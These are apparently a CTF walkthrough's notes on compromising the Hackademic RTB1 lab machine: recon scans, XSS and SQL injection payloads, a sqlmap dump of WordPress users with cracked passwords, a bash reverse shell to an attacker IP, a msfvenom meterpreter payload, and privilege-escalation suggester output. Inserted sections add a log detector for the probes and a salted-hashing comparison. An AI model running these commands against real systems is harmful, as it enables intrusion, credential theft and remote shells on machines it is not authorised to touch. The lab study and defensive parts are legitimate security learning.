recon

```bash
nmap -sV -sU -p- -v -A 192.168.1.2
whatweb -v 192.168.1.2
wpscan --url http://192.168.1.2 -e p,t,tt,u,m
dirb http://192.168.1.2/Hackademic_RTB1
dirb http://192.168.1.2
```
vulnerability

xss

URL ⇒

```python
PAYLOADS = {
    'Payloads': ['</p><script>alert(1);</script><p>'],
}
```
sql

URL ⇒

```python
PAYLOADS = {
    'Payload': ['1 AND 1=1 ', '"Sleep(2)'],
}
```
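From the defender's side, the XSS and SQL injection probe strings listed above are also what should show up in the web server's access log. The following is an added example, not part of the original notes: a small detector that parses Apache combined-format log lines, percent-decodes the request path, and flags the script-tag, tautology and time-based patterns above plus sqlmap's default User-Agent prefix. The log lines are constructed for the example, and the client IP, timestamps and paths in them are assumptions.

```python
# Added example (not from the original notes): flag HTTP requests that carry the
# XSS / SQL-injection probe strings listed above. Runs over constructed Apache
# combined-format access-log lines; IPs, timestamps and paths are hypothetical.
import re
from urllib.parse import unquote_plus

# Patterns derived from the payload strings above, plus sqlmap's default
# User-Agent, which begins with "sqlmap/".
PROBE_PATTERNS = {
    "xss_script_tag": re.compile(r"<\s*script\b", re.IGNORECASE),
    "sqli_tautology": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.IGNORECASE),
    "sqli_time_based": re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.IGNORECASE),
    "sqlmap_user_agent": re.compile(r"sqlmap/", re.IGNORECASE),
}

# Apache "combined" log format: ip ident user [time] "req" status size "ref" "ua"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def classify(line):
    """Return the probe labels matched by one log line ([] if benign).

    Lines that do not parse are reported as ["unparseable"] so that log
    tampering or format drift is not silently ignored.
    """
    m = LOG_LINE.match(line)
    if not m:
        return ["unparseable"]
    # Decode percent-encoding so '%3Cscript%3E' is inspected as '<script>'.
    decoded_path = unquote_plus(m.group("path"))
    hits = []
    for label, pattern in PROBE_PATTERNS.items():
        target = m.group("ua") if label == "sqlmap_user_agent" else decoded_path
        if pattern.search(target):
            hits.append(label)
    return hits


def scan(lines):
    """Return (client_ip, labels) for every line that raised at least one label."""
    findings = []
    for line in lines:
        hits = classify(line)
        if hits:
            m = LOG_LINE.match(line)
            findings.append((m.group("ip") if m else "?", hits))
    return findings


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '192.168.1.14 - - [10/Oct/2023:10:00:01 +0000] "GET /Hackademic_RTB1/?cat=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.1.14 - - [10/Oct/2023:10:00:02 +0000] "GET /Hackademic_RTB1/?cat=1%20AND%201=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.1.14 - - [10/Oct/2023:10:00:03 +0000] "GET /Hackademic_RTB1/?cat=%22Sleep(2) HTTP/1.1" 500 312 "-" "Mozilla/5.0"',
    '192.168.1.14 - - [10/Oct/2023:10:00:04 +0000] "GET /Hackademic_RTB1/?s=%3C/p%3E%3Cscript%3Ealert(1);%3C/script%3E%3Cp%3E HTTP/1.1" 200 4000 "-" "Mozilla/5.0"',
    '192.168.1.14 - - [10/Oct/2023:10:00:05 +0000] "GET /Hackademic_RTB1/?cat=1 HTTP/1.1" 200 5120 "-" "sqlmap/1.7 (https://sqlmap.org)"',
]

if __name__ == "__main__":
    for ip, labels in scan(SAMPLE_LOG):
        print(ip, labels)
```

The first sample line is a normal request and produces no label; the remaining four each trigger exactly one. Decoding the path before matching matters: the same probes sent percent-encoded would otherwise slip past a naive substring search.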
exploit

```bash
sqlmap -u 192.168.1.2/Hackademic_RTB1/?cat=1 -D wordpress -T wp_users --dump
```

| UserName | Hash | Password |
|---|---|---|
| NickJames | 21232f297a57a5a743894a0e4a801fc3 | admin |
| JohnSmith | b986448f0bb9e5e124ca91d3d650f52c | PUPPIES |
| GeorgeMiller | 7cbb3252ba6b7e9c422fac5334d22054 | q1w2e3 |
| TonyBlack | a6e514f9486b83cb53d8d932f9a04292 | napoleon |
| JasonKonnors | 8601f6e1028a8e8a966f6c33fcd9aec4 | maxwell |
| MaxBucky | 50484c19f1afdaf3841a0d821ed393d2 | kernel |
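The reason the dump resolves straight to passwords is the storage scheme: the hashes are bare 32-hex-character digests with no scheme prefix, i.e. unsalted MD5. The following is an added example, not part of the original notes: it takes the rows from the table above, confirms for each one whether the stored hash is exactly MD5 of the recorded password, and contrasts that with a salted, iterated PBKDF2 record of the kind a current application should store. The PBKDF2 scheme, its record format and the iteration count are assumptions for illustration, not what the target used.

```python
# Added example (not from the original notes): check whether the dumped
# wp_users hashes are plain unsalted MD5 of the recorded password, and show a
# salted, iterated alternative. The PBKDF2 record format below is hypothetical.
import hashlib
import hmac
import os

# Rows copied from the dump above: (username, stored hash, recorded password).
DUMPED_ROWS = [
    ("NickJames", "21232f297a57a5a743894a0e4a801fc3", "admin"),
    ("JohnSmith", "b986448f0bb9e5e124ca91d3d650f52c", "PUPPIES"),
    ("GeorgeMiller", "7cbb3252ba6b7e9c422fac5334d22054", "q1w2e3"),
    ("TonyBlack", "a6e514f9486b83cb53d8d932f9a04292", "napoleon"),
    ("JasonKonnors", "8601f6e1028a8e8a966f6c33fcd9aec4", "maxwell"),
    ("MaxBucky", "50484c19f1afdaf3841a0d821ed393d2", "kernel"),
]


def looks_like_raw_md5(stored_hash):
    """Format check only: 32 hex chars and no scheme prefix such as '$P$' or '$2y$'."""
    h = stored_hash.lower()
    return len(h) == 32 and all(c in "0123456789abcdef" for c in h)


def is_unsalted_md5(stored_hash, password):
    """True if stored_hash is exactly MD5(password): no salt, no iteration."""
    computed = hashlib.md5(password.encode()).hexdigest()
    return hmac.compare_digest(computed, stored_hash.lower())


def unsalted_md5_accounts(rows):
    """Usernames whose stored hash is confirmed to be unsalted MD5 of the password."""
    return [user for user, stored, pw in rows if is_unsalted_md5(stored, pw)]


# Hypothetical replacement: PBKDF2-HMAC-SHA256 with a random 16-byte salt,
# stored as one string "pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>".
def pbkdf2_record(password, iterations=600_000):
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_pbkdf2(record, password):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        scheme, iters, salt_hex, digest_hex = record.split("$")
    except ValueError:
        return False
    if scheme != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    print("raw-MD5 format:", [u for u, h, _ in DUMPED_ROWS if looks_like_raw_md5(h)])
    print("confirmed unsalted MD5:", unsalted_md5_accounts(DUMPED_ROWS))
    rec = pbkdf2_record("admin")
    print("pbkdf2 record verifies:", verify_pbkdf2(rec, "admin"))
```

Two properties of the PBKDF2 record are worth noting against the table above: the same password produces a different record every time because of the random salt, so a dump no longer collapses identical passwords into identical hashes, and the iteration count is stored alongside the digest so it can be raised over time without breaking existing records.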
```text
nc -lvp 5555
Payload = system('bash -i >& /dev/tcp/192.168.1.14/5555 0>&1');
msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=192.168.1.14 LPORT=9090 -f elf -o shell.bin
```
```text
use post/multi/recon/local_exploit_suggester
[+] 192.168.1.2 - exploit/linux/local/glibc_origin_expansion_priv_esc: The target appears to be vulnerable.
[+] 192.168.1.2 - exploit/linux/local/libuser_roothelper_priv_esc: The service is running, but could not be validated.
[+] 192.168.1.2 - exploit/linux/local/pkexec: The target appears to be vulnerable.
[+] 192.168.1.2 - exploit/linux/local/ptrace_sudo_token_priv_esc: The service is running, but could not be validated.
[+] 192.168.1.2 - exploit/linux/local/rds_rds_page_copy_user_priv_esc: The target appears to be vulnerable.
[+] 192.168.1.2 - exploit/linux/local/su_login: The target appears to be vulnerable.
```

